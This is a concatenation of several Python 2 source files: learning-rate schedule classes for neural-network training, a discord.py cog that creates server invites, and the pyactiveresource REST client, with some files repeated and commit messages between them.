        self.stop_after_deday_epoch = stop_after_deday_epoch
        self.lowest_error = init_error  # best (lowest) error observed so far
        self.epoch = 1
        self.decay = decay

    def get_rate(self):
        """Return the rate for the current epoch."""
        return self.rate

    def get_next_rate(self, current_error):
        """Advance one epoch given the latest error; return the new rate."""
        diff_error = 0.0
        # diff_error is computed but only lowest_error tracking uses current_error.
        diff_error = self.lowest_error - current_error
        if (current_error < self.lowest_error):
            self.lowest_error = current_error
        if (self.decay):
            if (self.epoch >= self.decay_start_epoch + self.stop_after_deday_epoch):
                self.rate = 0.0
            else:
                self.rate *= self.scale_by
        else:
            if (self.epoch >= self.decay_start_epoch):
                self.decay = True
                self.rate *= self.scale_by
        self.epoch += 1
        return self.rate
# save and load the learning rate class
def _lrate2file(lrate, filename='file.out'):
    """Pickle the whole learning-rate object to `filename` (highest protocol)."""
    with open(filename, "wb") as output:
        cPickle.dump(lrate, output, cPickle.HIGHEST_PROTOCOL)
def _file2lrate(filename='file.in'):
    """Unpickle and return a learning-rate object from `filename`.

    Uses a context manager so the file handle is closed promptly — the
    original left the open handle to the garbage collector.
    """
    with open(filename, 'rb') as inp:
        return cPickle.load(inp)
# functions to save and resume the learning rate
# the following 4 fields are written into <lrate_file>, each field per line
# lrate.epoch: the current epoch
# lrate.rate: the current learning rate
# lrate.lowest_error: the current lowest learning rate
# lrate.decay: whether decay has started
def save_lrate(lrate, lrate_file):
    """Write the resumable learning-rate state to `lrate_file`, one field per
    line: epoch, rate, lowest_error, decay (as 0/1). Always overwrites.

    Uses `with` so the handle is closed even if a write fails (the original
    used manual open/close, which leaked on exceptions).
    """
    with open(lrate_file, 'w') as file_open:  # always overwrite
        file_open.write(str(lrate.epoch) + '\n')
        file_open.write(str(lrate.rate) + '\n')
        file_open.write(str(lrate.lowest_error) + '\n')
        file_open.write(str(int(lrate.decay)) + '\n')
def resume_lrate(lrate, lrate_file):
    """Restore epoch, rate, lowest_error and decay from a save_lrate() file.

    Uses `with` so the handle is closed even if parsing fails (the original
    used manual open/close, which leaked on exceptions).
    """
    with open(lrate_file, 'r') as file_open:
        lines = file_open.read().splitlines()
    # Field order matches save_lrate: epoch, rate, lowest_error, decay.
    lrate.epoch = int(lines[0])
    lrate.rate = float(lines[1])
    lrate.lowest_error = float(lines[2])
    lrate.decay = bool(int(lines[3]))
# commit: a bug fix in utils/learn_rates.py (removed undefined `max_epochs` in LearningMinLrate)
# Copyright 2014 Yajie Miao Carnegie Mellon University
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# THIS CODE IS PROVIDED *AS IS* BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, EITHER EXPRESS OR IMPLIED, INCLUDING WITHOUT LIMITATION ANY IMPLIED
# WARRANTIES OR CONDITIONS OF TITLE, FITNESS FOR A PARTICULAR PURPOSE,
# MERCHANTABLITY OR NON-INFRINGEMENT.
# See the Apache 2 License for the specific language governing permissions and
# limitations under the License.
import cPickle
class LearningRate(object):
    """Abstract base for learning-rate schedules.

    Subclasses override get_rate() to report the current rate and
    get_next_rate() to advance the schedule after each epoch.
    """

    def __init__(self):
        """Nothing to initialize in the base class."""

    def get_rate(self):
        """Return the current learning rate (base class: no-op)."""
        pass

    def get_next_rate(self, current_error):
        """Advance one epoch given the latest validation error (base class: no-op)."""
        pass
class LearningRateConstant(LearningRate):
    """Constant learning rate for `epoch_num` epochs, then 0.0 to signal stop."""

    def __init__(self, learning_rate = 0.08, epoch_num = 20):
        self.learning_rate = learning_rate
        self.epoch = 1
        self.epoch_num = epoch_num
        self.rate = learning_rate

    def get_rate(self):
        """Return the rate for the current epoch."""
        return self.rate

    def get_next_rate(self, current_error):
        """Advance one epoch; the rate stays constant until the epoch budget runs out."""
        # A zero rate is the conventional "stop training" signal here.
        self.rate = 0.0 if self.epoch >= self.epoch_num else self.learning_rate
        self.epoch += 1
        return self.rate
class LearningRateExpDecay(LearningRate):
    """Exponential decay schedule.

    Decay starts once the per-epoch error improvement drops below
    `min_derror_decay_start` (after `min_epoch_decay_start` epochs); during
    decay the rate is multiplied by `scale_by` each epoch, and the rate is
    forced to 0.0 (stop) once improvement falls below `min_derror_stop`.
    """
    def __init__(self, start_rate = 0.08, scale_by = 0.5,
                 min_derror_decay_start = 0.05, min_derror_stop = 0.05, init_error = 100,
                 decay=False, min_epoch_decay_start=15, zero_rate = 0.0):
        self.start_rate = start_rate
        self.init_error = init_error
        self.rate = start_rate
        self.scale_by = scale_by
        self.min_derror_decay_start = min_derror_decay_start
        self.min_derror_stop = min_derror_stop
        self.lowest_error = init_error  # best (lowest) error observed so far
        self.epoch = 1
        self.decay = decay
        self.zero_rate = zero_rate  # NOTE(review): stored but never read here
        self.min_epoch_decay_start = min_epoch_decay_start

    def get_rate(self):
        """Return the rate for the current epoch."""
        return self.rate

    def get_next_rate(self, current_error):
        """Advance one epoch given the latest error; return the new rate."""
        # Improvement relative to the best error so far (negative if worse).
        diff_error = 0.0
        diff_error = self.lowest_error - current_error
        if (current_error < self.lowest_error):
            self.lowest_error = current_error
        if (self.decay):
            if (diff_error < self.min_derror_stop):
                self.rate = 0.0
            else:
                self.rate *= self.scale_by
        else:
            # Start decaying only after enough epochs AND a small improvement.
            if ((diff_error < self.min_derror_decay_start) and (self.epoch > self.min_epoch_decay_start)):
                self.decay = True
                self.rate *= self.scale_by
        self.epoch += 1
        return self.rate
class LearningMinLrate(LearningRate):
    """Decay schedule that stops once the rate falls below `min_lrate_stop`.

    Decay starts when the per-epoch error improvement drops below
    `min_derror_decay_start` after `min_epoch_decay_start` epochs; during
    decay the rate is scaled by `scale_by`, and set to 0.0 (stop) once it
    drops under `min_lrate_stop`.
    """
    def __init__(self, start_rate = 0.08, scale_by = 0.5,
                 min_derror_decay_start = 0.05,
                 min_lrate_stop = 0.0002, init_error = 100,
                 decay=False, min_epoch_decay_start=15):
        self.start_rate = start_rate
        self.init_error = init_error
        self.rate = start_rate
        self.scale_by = scale_by
        self.min_lrate_stop = min_lrate_stop
        self.lowest_error = init_error  # best (lowest) error observed so far
        self.min_derror_decay_start = min_derror_decay_start
        self.epoch = 1
        self.decay = decay
        self.min_epoch_decay_start = min_epoch_decay_start

    def get_rate(self):
        """Return the rate for the current epoch."""
        return self.rate

    def get_next_rate(self, current_error):
        """Advance one epoch given the latest error; return the new rate."""
        diff_error = 0.0
        # Improvement relative to the best error so far (negative if worse).
        diff_error = self.lowest_error - current_error
        if (current_error < self.lowest_error):
            self.lowest_error = current_error
        if (self.decay):
            if (self.rate < self.min_lrate_stop):
                self.rate = 0.0
            else:
                self.rate *= self.scale_by
        else:
            if (diff_error < self.min_derror_decay_start) and (self.epoch >= self.min_epoch_decay_start):
                self.decay = True
                self.rate *= self.scale_by
        self.epoch += 1
        return self.rate
class LearningFixedLrate(LearningRate):
    """Purely epoch-driven schedule: decay starts at ``decay_start_epoch``
    and the rate drops to 0.0 ``stop_after_deday_epoch`` epochs later.

    ``current_error`` only feeds the best-error bookkeeping; it never
    influences the rate.  (The ``deday`` spelling is kept for interface
    compatibility with existing callers.)
    """

    def __init__(self, start_rate = 0.08, scale_by = 0.5,
                 decay_start_epoch = 10, init_error = 100,
                 decay=False, stop_after_deday_epoch=6):
        self.start_rate = start_rate
        self.init_error = init_error
        self.rate = start_rate
        self.scale_by = scale_by
        self.decay_start_epoch = decay_start_epoch
        self.stop_after_deday_epoch = stop_after_deday_epoch
        self.lowest_error = init_error
        self.epoch = 1
        self.decay = decay

    def get_rate(self):
        """Return the current rate without advancing the schedule."""
        return self.rate

    def get_next_rate(self, current_error):
        """Advance one epoch and return the new rate."""
        self.lowest_error = min(self.lowest_error, current_error)
        if self.decay:
            if self.epoch >= self.decay_start_epoch + self.stop_after_deday_epoch:
                self.rate = 0.0
            else:
                self.rate *= self.scale_by
        elif self.epoch >= self.decay_start_epoch:
            self.decay = True
            self.rate *= self.scale_by
        self.epoch += 1
        return self.rate
# save and load the learning rate class
def _lrate2file(lrate, filename='file.out'):
    """Pickle the learning-rate schedule object *lrate* to *filename*."""
    with open(filename, "wb") as handle:
        cPickle.dump(lrate, handle, cPickle.HIGHEST_PROTOCOL)
def _file2lrate(filename='file.in'):
    """Load and return a pickled learning-rate schedule from *filename*.

    Uses a context manager so the file handle is closed promptly; the
    original passed a bare ``open(...)`` to ``cPickle.load`` and left the
    handle for the garbage collector.
    """
    with open(filename, 'rb') as handle:
        return cPickle.load(handle)
# functions to save and resume the learning rate
# the following 4 fields are written into <lrate_file>, each field per line
# lrate.epoch: the current epoch
# lrate.rate: the current learning rate
# lrate.lowest_error: the current lowest error seen so far
# lrate.decay: whether decay has started
def save_lrate(lrate, lrate_file):
    """Persist the resumable state of *lrate* to *lrate_file*.

    Writes four lines, one field per line, always overwriting the file:
    ``epoch``, ``rate``, ``lowest_error``, and ``decay`` (as 0/1).
    Counterpart of ``resume_lrate``.
    """
    # Context manager guarantees the handle is closed even if a write fails
    # (the original used explicit open()/close()).
    with open(lrate_file, 'w') as file_open:  # always overwrite
        file_open.write(str(lrate.epoch) + '\n')
        file_open.write(str(lrate.rate) + '\n')
        file_open.write(str(lrate.lowest_error) + '\n')
        file_open.write(str(int(lrate.decay)) + '\n')
def resume_lrate(lrate, lrate_file):
    """Restore state written by ``save_lrate`` into *lrate* in place.

    Reads the four fields (epoch, rate, lowest_error, decay) from
    *lrate_file*, one per line, and assigns them onto *lrate*.
    """
    # Context manager replaces explicit open()/close(); int()/float()
    # tolerate the trailing newline, so no manual stripping is needed.
    with open(lrate_file, 'r') as file_open:
        lrate.epoch = int(file_open.readline())
        lrate.rate = float(file_open.readline())
        lrate.lowest_error = float(file_open.readline())
        lrate.decay = bool(int(file_open.readline()))
|
import discord
from discord.ext import commands
from .utils import checks
class Invite:
    """Cog that creates invites for servers the bot is a member of."""

    def __init__(self, bot):
        self.bot = bot

    @commands.command(pass_context=True)
    @checks.admin_or_permissions(manage_server=True)
    async def makeinvite(self, ctx, *, server):
        """Create a permanent invite for the named server and DM it to
        the command author.

        Looks the server up by exact name among the servers the bot is in;
        on any failure the author is told no server was found or the bot
        lacks permission.
        """
        try:
            serverobject = discord.utils.get(self.bot.servers, name=server)
            invite = await self.bot.create_invite(serverobject, max_age=0)
            await self.bot.send_message(ctx.message.author, invite)
        except Exception:
            # Narrowed from a bare ``except:`` so KeyboardInterrupt /
            # SystemExit (and asyncio cancellation) still propagate.
            await self.bot.say("No server found or invalid permissions")
def setup(bot):
    """discord.py extension entry point: register the Invite cog."""
    bot.add_cog(Invite(bot))
Delete invite.py
|
#!/usr/bin/python2.4
# Authors: Jared Kuolt <me@superjared.com>, Mark Roach <mrroach@google.com>
"""Connect to and interact with a REST server and its objects."""
import new
import re
import sys
import urllib
import urlparse
from string import Template
from pyactiveresource import connection
from pyactiveresource import util
VALID_NAME = re.compile('[a-z_]\w*') # Valid python attribute names
class Error(Exception):
    """Base exception for errors raised by this module."""
class ResourceMeta(type):
    """Metaclass that fills in ``_singular``/``_plural`` resource names.

    ``_singular`` defaults to the CamelCase class name converted to
    lower_underscore; ``_plural`` defaults to the pluralized singular.
    A class may override either by declaring the attribute itself.
    """

    def __new__(mcs, name, bases, new_attrs):
        """Create a new class, deriving any missing name attributes.

        Args:
            mcs: The metaclass.
            name: The name of the class.
            bases: List of base classes from which mcs inherits.
            new_attrs: The class attribute dictionary.
        """
        if not new_attrs.get('_singular'):
            # CamelCase -> lower_underscore (e.g. PostComment -> post_comment)
            new_attrs['_singular'] = re.sub(
                r'\B((?<=[a-z])[A-Z]|[A-Z](?=[a-z]))', r'_\1', name).lower()
        if not new_attrs.get('_plural'):
            new_attrs['_plural'] = util.pluralize(new_attrs['_singular'])
        return type.__new__(mcs, name, bases, new_attrs)
class ClassAndInstanceMethod(object):
    """Descriptor that routes one attribute name to either a class-level
    or an instance-level method, depending on how it is accessed."""

    def __init__(self, class_method, instance_method):
        # Names (not callables) of the two target methods.
        self.class_method = class_method
        self.instance_method = instance_method

    def __get__(self, instance, owner):
        """Return the instance method when accessed through an instance,
        otherwise the class method looked up on *owner*."""
        if instance:
            return getattr(instance, self.instance_method)
        return getattr(owner, self.class_method)
class ActiveResource(object):
    """Represents an activeresource object.

    NOTE(review): this is Python 2 code -- ``__metaclass__``,
    ``dict.iteritems``, ``__cmp__``, ``urllib.urlencode`` and
    ``new.classobj`` all predate Python 3.
    """
    # The ResourceMeta metaclass fills in _singular/_plural class names.
    __metaclass__ = ResourceMeta
    # Per-class connection configuration; subclasses override these.
    _site = ''
    _user = ''
    _password = ''
    _connection_obj = None  # cached Connection, built lazily by _connection()
    _headers = None
    _timeout = 5

    def __init__(self, attributes, prefix_options=None):
        """Initialize a new ActiveResource object.

        Args:
            attributes: A dictionary of attributes which represent this object.
            prefix_options: A dict of prefixes to add to the request for
                nested URLs.
        """
        self.attributes = {}
        if prefix_options:
            self._prefix_options = prefix_options
        else:
            self._prefix_options = {}
        self._update(attributes)
        # Sentinel checked by __setattr__: from this point on, unknown
        # attribute assignments are stored in self.attributes as fields.
        self._initialized = True

    # Public class methods which act as factory functions
    @classmethod
    def find(cls, id_=None, from_=None, **kwargs):
        """Core method for finding resources.

        Args:
            id_: A specific resource to retrieve.
            from_: The path that resources will be fetched from.
            kwargs: any keyword arguments for query.
        Returns:
            An ActiveResource object.
        Raises:
            connection.Error: On any communications errors.
            Error: On any other errors.
        """
        if id_:
            return cls._find_single(id_, **kwargs)
        return cls._find_every(from_=from_, **kwargs)

    @classmethod
    def find_one(cls, from_, **kwargs):
        """Get a single resource from a specific URL.

        Args:
            from_: The path that resources will be fetched from.
            kwargs: Any keyword arguments for query.
        Returns:
            An ActiveResource object.
        Raises:
            connection.Error: On any communications errors.
            Error: On any other errors.
        """
        return cls._find_one(from_, kwargs)

    @classmethod
    def exists(cls, id_, **kwargs):
        """Check whether a resource exists.

        Args:
            id_: The id or other key which specifies a unique object.
            kwargs: Any keyword arguments for query.
        Returns:
            True if the resource is found, False otherwise.
        """
        prefix_options, query_options = cls._split_options(kwargs)
        path = cls._element_path(id_, prefix_options, query_options)
        try:
            # A HEAD request is enough: only the status matters here.
            _ = cls._connection().head(path, cls._headers)
            return True
        except connection.Error:
            return False

    # Non-public class methods to support the above
    @classmethod
    def _split_options(cls, options):
        """Split prefix options and query options.

        Args:
            options: A dictionary of prefix and/or query options.
        Returns:
            A tuple containing (prefix_options, query_options)
        """
        #TODO(mrroach): figure out prefix_options
        prefix_options = {}
        query_options = {}
        for key, value in options.items():
            if key in cls._prefix_parameters():
                prefix_options[key] = value
            else:
                query_options[key] = value
        # NOTE(review): returns a list, though the docstring promises a
        # tuple; unpacking callers work either way.
        return [prefix_options, query_options]

    @classmethod
    def _find_single(cls, id_, **kwargs):
        """Get a single object from the default URL.

        Args:
            id_: The id or other key which specifies a unique object.
            kwargs: Any keyword arguments for the query.
        Returns:
            An ActiveResource object.
        Raises:
            ConnectionError: On any error condition.
        """
        prefix_options, query_options = cls._split_options(kwargs)
        path = cls._element_path(id_, prefix_options, query_options)
        return cls._build_object(cls._connection().get(path, cls._headers),
                                 prefix_options)

    @classmethod
    def _find_one(cls, from_, query_options):
        """Find a single resource from a one-off URL.

        Args:
            from_: The path from which to retrieve the resource.
            query_options: Any keyword arguments for the query.
        Returns:
            An ActiveResource object.
        Raises:
            connection.ConnectionError: On any error condition.
        """
        #TODO(mrroach): allow from_ to be a string-generating function
        path = from_ + cls._query_string(query_options)
        return cls._build_object(cls._connection().get(path, cls._headers))

    @classmethod
    def _find_every(cls, from_=None, **kwargs):
        """Get all resources.

        Args:
            from_: (optional) The path from which to retrieve the resource.
            kwargs: Any keyword arguments for the query.
        Returns:
            A list of resources.
        """
        if from_:
            path = from_ + cls._query_string(kwargs)
            prefix_options = None
        else:
            prefix_options, query_options = cls._split_options(kwargs)
            path = cls._collection_path(prefix_options, query_options)
        return cls._build_list(cls._connection().get(path, cls._headers),
                               prefix_options)

    @classmethod
    def _build_object(cls, xml, prefix_options=None):
        """Create an object or objects for the given xml string.

        Args:
            xml: An xml string containing the object definition.
            prefix_options: A dict of prefixes to add to the request for
                nested URLs.
        Returns:
            An ActiveResource object.
        """
        # saveroot=True keeps the root tag; its value is the attribute dict.
        element_type, attributes = util.xml_to_dict(
            xml, saveroot=True).items()[0]
        return cls(attributes, prefix_options)

    @classmethod
    def _build_list(cls, xml, prefix_options=None):
        """Create a list of objects for the given xml string.

        Args:
            xml: An xml string containing multiple object definitions.
            prefix_options: A dict of prefixes to add to the request for
                nested URLs.
        Returns:
            A list of ActiveResource objects.
        """
        resources = []
        collection_type, elements = util.xml_to_dict(
            xml, saveroot=True).items()[0]
        for element in elements:
            resources.append(cls(element, prefix_options))
        return resources

    @classmethod
    def _query_string(cls, query_options):
        """Return a query string for the given options.

        Args:
            query_options: A dictionary of query keys/values.
        Returns:
            A string containing the encoded query.
        """
        if query_options:
            return '?' + urllib.urlencode(query_options)
        else:
            return ''

    @classmethod
    def _element_path(cls, id_, prefix_options=None, query_options=None):
        """Get the element path for the given id.

        Examples:
            Comment.element_path(1, {'post_id': 5}) -> /posts/5/act

        Args:
            id_: The id of the object to retrieve.
            prefix_options: A dict of prefixes to add to the request for
                nested URLs.
            query_options: A dict of items to add to the query string for
                the request.
        Returns:
            The path (relative to site) to the element formatted with the query.
        """
        return '%(prefix)s/%(plural)s/%(id)s.%(format)s%(query)s' % {
            'prefix': cls._prefix(prefix_options),
            'plural': cls._plural,
            'id': id_,
            'format': 'xml',
            'query': cls._query_string(query_options)}

    @classmethod
    def _collection_path(cls, prefix_options=None, query_options=None):
        """Get the collection path for this object type.

        Examples:
            Comment.collection_path() -> /comments.xml
            Comment.collection_path(query_options={'active': 1})
                -> /comments.xml?active=1
            Comment.collection_path({'posts': 5})
                -> /posts/5/comments.xml

        Args:
            prefix_options: A dict of prefixes to add to the request for
                nested URLs
            query_options: A dict of items to add to the query string for
                the request.
        Returns:
            The path (relative to site) to this type of collection.
        """
        return '%(prefix)s/%(plural)s.%(format)s%(query)s' % {
            'prefix': cls._prefix(prefix_options),
            'plural': cls._plural,
            'format': 'xml',
            'query': cls._query_string(query_options)}

    @classmethod
    def _custom_method_collection_url(cls, method_name, options):
        # Build /<prefix>/<plural>/<method_name>.xml[?query] for
        # collection-level custom methods.
        prefix_options, query_options = cls._split_options(options)
        path = (
            '%(prefix)s/%(plural)s/%(method_name)s.%(format)s%(query)s' %
            {'prefix': cls._prefix(prefix_options),
             'plural': cls._plural,
             'method_name': method_name,
             'format': 'xml',
             'query': cls._query_string(query_options)})
        return path

    @classmethod
    def _class_get(cls, method_name, **kwargs):
        """Get a nested resource or resources.

        Args:
            method_name: the nested resource to retrieve.
            kwargs: Any keyword arguments for the query.
        Returns:
            A dictionary representing the returned data.
        """
        url = cls._custom_method_collection_url(method_name, kwargs)
        return util.xml_to_dict(cls._connection().get(url, cls._headers))

    @classmethod
    def _class_post(cls, method_name, body='', **kwargs):
        """POST to a nested resource.

        Args:
            method_name: the nested resource to post to.
            body: The data to send as the body of the request.
            kwargs: Any keyword arguments for the query.
        Returns:
            The connection's response object.
        """
        url = cls._custom_method_collection_url(method_name, kwargs)
        return cls._connection().post(url, cls._headers, body)

    @classmethod
    def _class_put(cls, method_name, body='', **kwargs):
        """PUT to a nested resource.

        Args:
            method_name: the nested resource to update.
            body: The data to send as the body of the request.
            kwargs: Any keyword arguments for the query.
        Returns:
            The connection's response object.
        """
        url = cls._custom_method_collection_url(method_name, kwargs)
        return cls._connection().put(url, cls._headers, body)

    @classmethod
    def _class_delete(cls, method_name, **kwargs):
        """DELETE a nested resource or resources.

        Args:
            method_name: the nested resource to delete.
            kwargs: Any keyword arguments for the query.
        Returns:
            The connection's response object.
        """
        url = cls._custom_method_collection_url(method_name, kwargs)
        return cls._connection().delete(url, cls._headers)

    @classmethod
    def _prefix_parameters(cls):
        """Return a list of the parameters used in the site prefix.

        e.g. /objects/$object_id would yield ['object_id']
             /objects/${object_id}/people/$person_id/ would yield
             ['object_id', 'person_id']

        Args:
            None
        Returns:
            A set of named parameters.
        """
        path = urlparse.urlsplit(cls._site)[2]
        template = Template(path)
        keys = set()
        # string.Template's own pattern captures $name / ${name} groups.
        for match in template.pattern.finditer(path):
            for match_type in 'braced', 'named':
                if match.groupdict()[match_type]:
                    keys.add(match.groupdict()[match_type])
        return keys

    @classmethod
    def _prefix(cls, options=None):
        """Return the prefix for this object type.

        Args:
            options: A dictionary containing additional prefixes to prepend.
        Returns:
            A string containing the path to this element.
        """
        # Strip a trailing slash from the site path before substitution.
        path = re.sub('/$', '', urlparse.urlsplit(cls._site)[2])
        template = Template(path)
        keys = cls._prefix_parameters()
        # Unknown keys substitute as '' rather than raising.
        options = dict([(k, options.get(k, '')) for k in keys])
        return template.safe_substitute(options)

    @classmethod
    def _connection(cls):
        """Return a connection object which handles HTTP requests."""
        # NOTE(review): lazy per-class cache; not thread-safe, but matches
        # the original behavior.
        if not cls._connection_obj:
            cls._connection_obj = connection.Connection(
                cls._site, cls._user, cls._password, cls._timeout)
        return cls._connection_obj

    @classmethod
    def _scrub_name(cls, name):
        """Remove invalid characters from attribute names.

        Args:
            name: the string to scrub
        Returns:
            The part of the string that is a valid name, or None if unscrubbable
        """
        name = name.lower().replace('-', '_')
        match = VALID_NAME.search(name)
        if match:
            return match.group(0)
        return None

    # Public instance methods
    def to_dict(self):
        """Convert the object to a dictionary."""
        values = {}
        # Recursively convert nested resources and lists of resources.
        for key, value in self.attributes.iteritems():
            if isinstance(value, list):
                values[key] = [i.to_dict() for i in value]
            elif isinstance(value, ActiveResource):
                values[key] = value.to_dict()
            else:
                values[key] = value
        return values

    def to_xml(self, root=None, header=True, pretty=False):
        """Convert the object to an xml string.

        Args:
            root: The name of the root element for xml output.
            header: Whether to include the xml header.
            pretty: Whether to pretty-print the xml output.
        Returns:
            An xml string.
        """
        if not root:
            root = self._singular
        return util.to_xml(self.to_dict(), root=root,
                           header=header, pretty=pretty)

    def save(self):
        """Save the object to the server.

        Issues a PUT when the object already has an id, otherwise a POST.

        Args:
            None
        Returns:
            None.
        Raises:
            connection.Error: On any communications problems.
        """
        if self.id:
            response = self._connection().put(
                self._element_path(self.id, self._prefix_options),
                self._headers,
                data=self.to_xml())
        else:
            response = self._connection().post(
                self._collection_path(self._prefix_options),
                self._headers,
                data=self.to_xml())
        try:
            attributes = util.xml_to_dict(response)
        except Error:
            # Response body was not parseable xml; keep local state as-is.
            return
        self._update(attributes)
        return response

    def destroy(self):
        """Deletes the resource from the remote service.

        Args:
            None
        Returns:
            None
        """
        self._connection().delete(
            self._element_path(self.id, self._prefix_options),
            self.__class__._headers)

    def __getattr__(self, name):
        """Retrieve the requested attribute if it exists.

        Args:
            name: The attribute name.
        Returns:
            The attribute's value.
        Raises:
            AttributeError: if no such attribute exists.
        """
        #TODO(mrroach): Use descriptors instead of __getattr__
        if name == 'id':
            # id should always be getattrable
            return self.attributes.get('id')
        if name in self.attributes:
            return self.attributes[name]
        raise AttributeError(name)

    def __setattr__(self, name, value):
        """Set the named attributes.

        Unknown names set after __init__ has finished are also recorded
        in self.attributes so they round-trip as resource fields.

        Args:
            name: The attribute name.
            value: The attribute's value.
        Returns:
            None
        """
        if '_initialized' in self.__dict__:
            if name in self.__dict__ or name in self.__class__.__dict__:
                # Update a normal attribute
                object.__setattr__(self, name, value)
            else:
                # Add/update an attribute
                self.attributes[name] = value
        # Always mirror onto the instance __dict__ (also the path taken
        # during __init__, before _initialized exists).
        object.__setattr__(self, name, value)

    def __repr__(self):
        return '%s(%s)' % (self._singular, self.id)

    def __cmp__(self, other):
        # Python 2 ordering: compare by id, directly or against another
        # resource's id.
        if isinstance(other, self.__class__):
            return cmp(self.id, other.id)
        else:
            return cmp(self.id, other)

    def _update(self, attributes):
        """Update the object with the given attributes.

        Nested dicts become resource objects, lists become lists of
        resource objects; everything else is stored verbatim.

        Args:
            attributes: A dictionary of attributes.
        Returns:
            None
        """
        self.attributes = {}
        # Add all the tags in the element as attributes
        for key, value in attributes.items():
            if isinstance(value, dict):
                klass = self._find_class_for(key)
                attr = klass(value)
            elif isinstance(value, list):
                klass = self._find_class_for(util.singularize(key))
                attr = [klass(child) for child in value]
            else:
                attr = value
            # Store the actual value in the attributes dictionary
            self.attributes[key] = attr
            # NOTE(review): attr_name is computed but never used here --
            # looks vestigial.
            attr_name = self._scrub_name(key)

    def _find_class_for(self, element_name=None, class_name=None):
        """Look in the parent modules for classes matching the element name.

        One, or both of element/class name must be specified.

        Args:
            element_name: The name of the element type.
            class_name: The class name of the element type.
        Returns:
            A Resource class.
        """
        if not element_name and not class_name:
            raise Error('One of element_name,class_name must be specified.')
        elif not element_name:
            element_name = util.underscore(class_name)
        elif not class_name:
            class_name = util.camelize(element_name)
        module_path = self.__module__.split('.')
        # Walk from the deepest enclosing package outwards, trying the
        # module itself and then a same-named submodule at each level.
        for depth in range(len(module_path), 0, -1):
            try:
                __import__('.'.join(module_path[:depth]))
                module = sys.modules['.'.join(module_path[:depth])]
            except ImportError:
                continue
            try:
                klass = getattr(module, class_name)
                return klass
            except AttributeError:
                try:
                    __import__('.'.join([module.__name__, element_name]))
                    submodule = sys.modules['.'.join([module.__name__,
                                                      element_name])]
                except ImportError:
                    continue
                try:
                    klass = getattr(submodule, class_name)
                    return klass
                except AttributeError:
                    continue
        # If we made it this far, no such class was found
        # (fall back to a dynamically created subclass of this class).
        return new.classobj(class_name, (self.__class__,),
                            {'__module__': self.__module__})

    # methods corresponding to Ruby's custom_methods
    def _custom_method_element_url(self, method_name, options):
        # Build /<prefix>/<plural>/<id>/<method_name>.xml[?query] for
        # element-level custom methods.
        prefix_options, query_options = self._split_options(options)
        prefix_options.update(self._prefix_options)
        path = (
            '%(prefix)s/%(plural)s/%(id)s/%(method_name)s.%(format)s%(query)s' %
            {'prefix': self._prefix(prefix_options),
             'plural': self._plural,
             'id': self.id,
             'method_name': method_name,
             'format': 'xml',
             'query': self._query_string(query_options)})
        return path

    def _custom_method_new_element_url(self, method_name, options):
        # Build /<prefix>/<plural>/new/<method_name>.xml[?query] for
        # custom methods on not-yet-saved elements.
        prefix_options, query_options = self._split_options(options)
        prefix_options.update(self._prefix_options)
        path = (
            '%(prefix)s/%(plural)s/new/%(method_name)s.%(format)s%(query)s' %
            {'prefix': self._prefix(prefix_options),
             'plural': self._plural,
             'method_name': method_name,
             'format': 'xml',
             'query': self._query_string(query_options)})
        return path

    def _instance_get(self, method_name, **kwargs):
        """Get a nested resource or resources.

        Args:
            method_name: the nested resource to retrieve.
            kwargs: Any keyword arguments for the query.
        Returns:
            A dictionary representing the returned data.
        """
        url = self._custom_method_element_url(method_name, kwargs)
        return util.xml_to_dict(self._connection().get(url, self._headers))

    def _instance_post(self, method_name, body='', **kwargs):
        """Create a new resource/nested resource.

        Args:
            method_name: the nested resource to post to.
            body: The data to send as the body of the request.
            kwargs: Any keyword arguments for the query.
        Returns:
            The connection's response object.
        """
        if self.id:
            url = self._custom_method_element_url(method_name, kwargs)
        else:
            if not body:
                # Default the body to this (unsaved) object's own xml.
                body = self.to_xml()
            url = self._custom_method_new_element_url(method_name, kwargs)
        return self._connection().post(url, self._headers, body)

    def _instance_put(self, method_name, body='', **kwargs):
        """Update a nested resource.

        Args:
            method_name: the nested resource to update.
            body: The data to send as the body of the request.
            kwargs: Any keyword arguments for the query.
        Returns:
            The connection's response object.
        """
        url = self._custom_method_element_url(method_name, kwargs)
        return self._connection().put(url, self._headers, body)

    def _instance_delete(self, method_name, **kwargs):
        """Delete a nested resource or resources.

        Args:
            method_name: the nested resource to delete.
            kwargs: Any keyword arguments for the query.
        Returns:
            The connection's response object.
        """
        url = self._custom_method_element_url(method_name, kwargs)
        return self._connection().delete(url, self._headers)

    # Create property which returns class/instance method based on context
    get = ClassAndInstanceMethod('_class_get', '_instance_get')
    post = ClassAndInstanceMethod('_class_post', '_instance_post')
    put = ClassAndInstanceMethod('_class_put', '_instance_put')
    delete = ClassAndInstanceMethod('_class_delete', '_instance_delete')
Match Ruby's XML format better by using saveroot and throwing away the top-level root for hashes.
#!/usr/bin/python2.4
# Authors: Jared Kuolt <me@superjared.com>, Mark Roach <mrroach@google.com>
"""Connect to and interact with a REST server and its objects."""
import new
import re
import sys
import urllib
import urlparse
from string import Template
from pyactiveresource import connection
from pyactiveresource import util
VALID_NAME = re.compile('[a-z_]\w*') # Valid python attribute names
class Error(Exception):
    """Base exception type raised by this module."""
class ResourceMeta(type):
    """Metaclass deriving ``_singular``/``_plural`` names for resources.

    Unless a class declares them itself, ``_singular`` is the CamelCase
    class name converted to lower_underscore and ``_plural`` is the
    pluralized singular.
    """

    def __new__(mcs, name, bases, new_attrs):
        """Create a new class, deriving any missing name attributes.

        Args:
            mcs: The metaclass.
            name: The name of the class.
            bases: List of base classes from which mcs inherits.
            new_attrs: The class attribute dictionary.
        """
        if not new_attrs.get('_singular'):
            # CamelCase -> lower_underscore (e.g. PostComment -> post_comment)
            lowered = re.sub(r'\B((?<=[a-z])[A-Z]|[A-Z](?=[a-z]))',
                             r'_\1', name).lower()
            new_attrs['_singular'] = lowered
        if not new_attrs.get('_plural'):
            new_attrs['_plural'] = util.pluralize(new_attrs['_singular'])
        return type.__new__(mcs, name, bases, new_attrs)
class ClassAndInstanceMethod(object):
    """Descriptor giving class-level and instance-level access to one
    attribute name, dispatching to different underlying methods."""

    def __init__(self, class_method, instance_method):
        # Names (not callables) of the two target methods.
        self.class_method = class_method
        self.instance_method = instance_method

    def __get__(self, instance, owner):
        """Dispatch to the instance method for instance access, else to
        the class method on *owner*."""
        if instance:
            return getattr(instance, self.instance_method)
